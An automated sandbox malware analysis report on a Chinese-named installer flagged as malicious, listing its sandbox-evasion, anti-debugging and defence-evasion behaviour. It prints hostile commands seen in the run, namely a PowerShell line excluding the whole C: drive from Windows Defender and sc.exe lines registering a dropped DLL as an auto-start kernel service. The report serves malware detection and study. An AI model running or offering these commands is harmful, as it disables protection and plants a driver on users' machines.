Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5976Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3847Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpWindow / User API: threadDelayed 636Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpWindow / User API: threadDelayed 556Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpWindow / User API: threadDelayed 555Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C21AEC0 FindFirstFileA,FindClose,FindClose,6_2_6C21AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_006B6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_006B7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006B9C60 GetSystemInfo,9_2_006B9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000002.1776974855.000000000158C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C0A3886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6C0A3886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C230181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C230181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_007357D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_007357D0
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C239D35 mov eax, dword ptr fs:[00000030h]6_2_6C239D35
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C239D66 mov eax, dword ptr fs:[00000030h]6_2_6C239D66
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C22F17D mov eax, dword ptr fs:[00000030h]6_2_6C22F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C228CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C228CBD
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C230181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C230181

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpCode function: 6_2_6C2F7720 cpuid 6_2_6C2F7720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_006BAB2A GetSystemTimeAsFileTime,9_2_006BAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00750090 GetVersion,9_2_00750090
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Windows Management Instrumentation		1
Windows Service		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Windows Service		1
Disable or Modify Tools		LSASS Memory441
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution		Logon Script (Windows)111
Process Injection		241
Virtualization/Sandbox Evasion		Security Account Manager241
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API		Login Hook1
DLL Side-Loading		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials2
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem45
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580228 Sample: #U5b89#U88c5#U52a9#U624b1.0.2.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 92 98 Multi AV Scanner detection for dropped file 2->98 100 Multi AV Scanner detection for submitted file 2->100 102 Found driver which could be used to inject code into processes 2->102 104 2 other signatures 2->104 10 #U5b89#U88c5#U52a9#U624b1.0.2.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 30 other processes 2->17 process3 file4 96 C:\...\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, PE32 10->96 dropped 19 #U5b89#U88c5#U52a9#U624b1.0.2.tmp 3 5 10->19         started        23 conhost.exe 10->23         started        25 sc.exe 1 13->25         started        27 sc.exe 1 15->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 sc.exe 1 17->33         started        35 26 other processes 17->35 process5 file6 80 C:\Users\user\AppData\Local\...\update.vac, PE32 19->80 dropped 82 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->82 dropped 106 Adds a directory exclusion to Windows Defender 19->106 37 #U5b89#U88c5#U52a9#U624b1.0.2.exe 2 19->37         started        40 powershell.exe 23 19->40         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 conhost.exe 35->53         started        55 25 other processes 35->55 signatures7 process8 file9 86 C:\...\#U5b89#U88c5#U52a9#U624b1.0.2.tmp, PE32 37->86 dropped 57 #U5b89#U88c5#U52a9#U624b1.0.2.tmp 4 16 37->57         started        108 Loading BitLocker PowerShell Module 40->108 61 conhost.exe 40->61         started        63 WmiPrvSE.exe 40->63         started        65 Conhost.exe 43->65         started        signatures10 process11 file12 88 C:\Users\user\AppData\Local\...\update.vac, PE32 57->88 dropped 90 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 57->90 dropped 92 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 57->92 dropped 94 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 57->94 dropped 110 Query firmware table information (likely to detect VMs) 57->110 112 Protects its processes via BreakOnTermination flag 57->112 114 Hides threads from debuggers 57->114 116 Contains functionality to hide a thread from the debugger 57->116 67 7zr.exe 2 57->67         started        70 7zr.exe 7 57->70         started        72 cmd.exe 57->72         started        signatures13 process14 file15 84 C:\Program Files (x86)\...\tProtect.dll, PE32+ 67->84 dropped 74 conhost.exe 67->74         started        76 conhost.exe 70->76         started        78 sc.exe 72->78         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b1.0.2.exe7%VirustotalBrowse
#U5b89#U88c5#U52a9#U624b1.0.2.exe0%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc15%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll6%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-27JG6.tmp\_isetup\_setup64.tmp0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-P3CLM.tmp\_isetup\_setup64.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
217.20.58.99
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b1.0.2.exefalse
      		high
      https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1684520948.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1683832146.0000000003710000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000000.1685903370.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.1775195665.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drfalse
        		high
        https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1684520948.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1683832146.0000000003710000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000001.00000000.1685903370.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.1775195665.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.drfalse
          		high

          World Map of Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1580228
          Start date and time:2024-12-24 05:00:48 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 10m 11s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:110
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Critical Process Termination
          Sample name:#U5b89#U88c5#U52a9#U624b1.0.2.exe
          renamed because original name is a hash value
          Original Sample Name:1.0.2.exe
          Detection:MAL
          Classification:mal92.evad.winEXE@134/33@0/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 77%
          • Number of executed functions: 52
          • Number of non-executed functions: 81
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

          Warnings

          • Exclude process from analysis (whitelisted): SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.85.23.206
